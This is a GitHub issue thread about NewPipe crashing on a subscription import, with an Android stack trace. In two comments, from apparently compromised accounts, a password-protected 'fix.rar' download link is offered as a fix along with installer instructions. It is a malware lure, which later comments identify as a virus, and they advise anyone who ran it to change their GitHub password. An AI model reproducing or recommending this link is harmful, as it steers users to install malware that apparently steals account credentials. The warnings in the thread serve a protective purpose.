### ISSUE TITLE
Importing Subscriptions Crash

### ISSUE THREAD

**Issue by Youlooklikescoobydoo** [TeamNewPipe/NewPipe#11475]
### Checklist

- [X] I am able to reproduce the bug with the latest version given here: [CLICK THIS LINK](https://github.com/TeamNewPipe/NewPipe/releases/latest).
- [X] I made sure that there are *no existing issues* - [open](https://github.com/TeamNewPipe/NewPipe/issues) or [closed](https://github.com/TeamNewPipe/NewPipe/issues?q=is%3Aissue+is%3Aclosed) - which I could contribute my information to.
- [X] I have read the [FAQ](https://newpipe.net/FAQ/) and my problem isn't listed.
- [X] I have taken the time to fill in all the required details. I understand that the bug report will be dismissed otherwise.
- [X] This issue contains only one bug.
- [X] I have read and understood the [contribution guidelines](https://github.com/TeamNewPipe/NewPipe/blob/dev/.github/CONTRIBUTING.md).

### Affected version

0.27.3

### Steps to reproduce the bug

Importing my YouTube subscriptions apparently crashes the app, not much to add. (At first I was dumb and tried to import the zip hahah... but then I tried actually doing it well and I got disappointed)

## Exception
* __User Action:__ ui error
* __Request:__ ACRA report
* __Content Country:__ AR
* __Content Language:__ es-AR
* __App Language:__ es_AR
* __Service:__ none
* __Version:__ 0.27.2
* __OS:__ Linux motorola/guam_retail/guam:10/QPZ30.30-Q3-38-69/0e470:user/release-keys 10 - 29
<details><summary><b>Crash log </b></summary><p>

```
java.lang.RuntimeException: Unable to start service org.schabi.newpipe.local.subscription.services.SubscriptionsImportService@fb38cd0 with Intent { cmp=org.schabi.newpipe/.local.subscription.services.SubscriptionsImportService (has extras) }: java.lang.SecurityException: Permission Denial: opening provider filemanger.manager.iostudio.manager.utils.ShareFileProvider from ProcessRecord{cfcd54d 25969:org.schabi.newpipe/u0a1305} (pid=25969, uid=11305) that is not exported from UID 11190
	at android.app.ActivityThread.handleServiceArgs(ActivityThread.java:4298)
	at android.app.ActivityThread.access$1900(ActivityThread.java:233)
	at android.app.ActivityThread$H.handleMessage(ActivityThread.java:2036)
	at android.os.Handler.dispatchMessage(Handler.java:107)
	at android.os.Looper.loop(Looper.java:241)
	at android.app.ActivityThread.main(ActivityThread.java:7582)
	at java.lang.reflect.Method.invoke(Native Method)
	at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:492)
	at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:941)
Caused by: java.lang.SecurityException: Permission Denial: opening provider filemanger.manager.iostudio.manager.utils.ShareFileProvider from ProcessRecord{cfcd54d 25969:org.schabi.newpipe/u0a1305} (pid=25969, uid=11305) that is not exported from UID 11190
	at android.os.Parcel.createException(Parcel.java:2072)
	at android.os.Parcel.readException(Parcel.java:2040)
	at android.os.Parcel.readException(Parcel.java:1988)
	at android.app.IActivityManager$Stub$Proxy.getContentProvider(IActivityManager.java:5308)
	at android.app.ActivityThread.acquireProvider(ActivityThread.java:6780)
	at android.app.ContextImpl$ApplicationContentResolver.acquireUnstableProvider(ContextImpl.java:2769)
	at android.content.ContentResolver.acquireUnstableProvider(ContentResolver.java:2117)
	at android.content.ContentResolver.openAssetFileDescriptor(ContentResolver.java:1505)
	at android.content.ContentResolver.openFileDescriptor(ContentResolver.java:1338)
	at android.content.ContentResolver.openFileDescriptor(ContentResolver.java:1286)
	at us.shandian.giga.io.FileStreamSAF.<init>(FileStreamSAF.java:32)
	at org.schabi.newpipe.streams.io.StoredFileHelper.getStream(StoredFileHelper.java:188)
	at org.schabi.newpipe.local.subscription.services.SubscriptionsImportService.onStartCommand(SubscriptionsImportService.java:122)
	at android.app.ActivityThread.handleServiceArgs(ActivityThread.java:4280)
	... 8 more

```
</details>
<hr>

### Affected Android/Custom ROM version

Android 10

### Affected device model

Moto E7 Plus

**Comment by YoungAgile** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by YoungAgile** [comment]
> Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."

Virus, please do not click on the link

**Comment by Youlooklikescoobydoo** [comment]
> > Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."
> 
> Virus, please do not click on the link

Checked it and can't even apply whatever it's supposed to be lol. Yeah, I went no-brainer for a moment but even with my temporal stupidity I wouldn't be able to apply such fix file.

**Comment by YoungAgile** [comment]
> > > Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."
> > 
> > 
> > Virus, please do not click on the link
> 
> Checked it and can't even apply whatever it's supposed to be lol. Yeah, I went no-brainer for a moment but even with my temporal stupidity I wouldn't be able to apply such fix file. (Nvm, found the exe file, but this shit is android LMAO)

If you have run it on your computer, please change your GitHub password, otherwise you will make comments under various issues

**Comment by Youlooklikescoobydoo** [comment]
Just now I notice I typed "3" instead of "2" :skull: kms
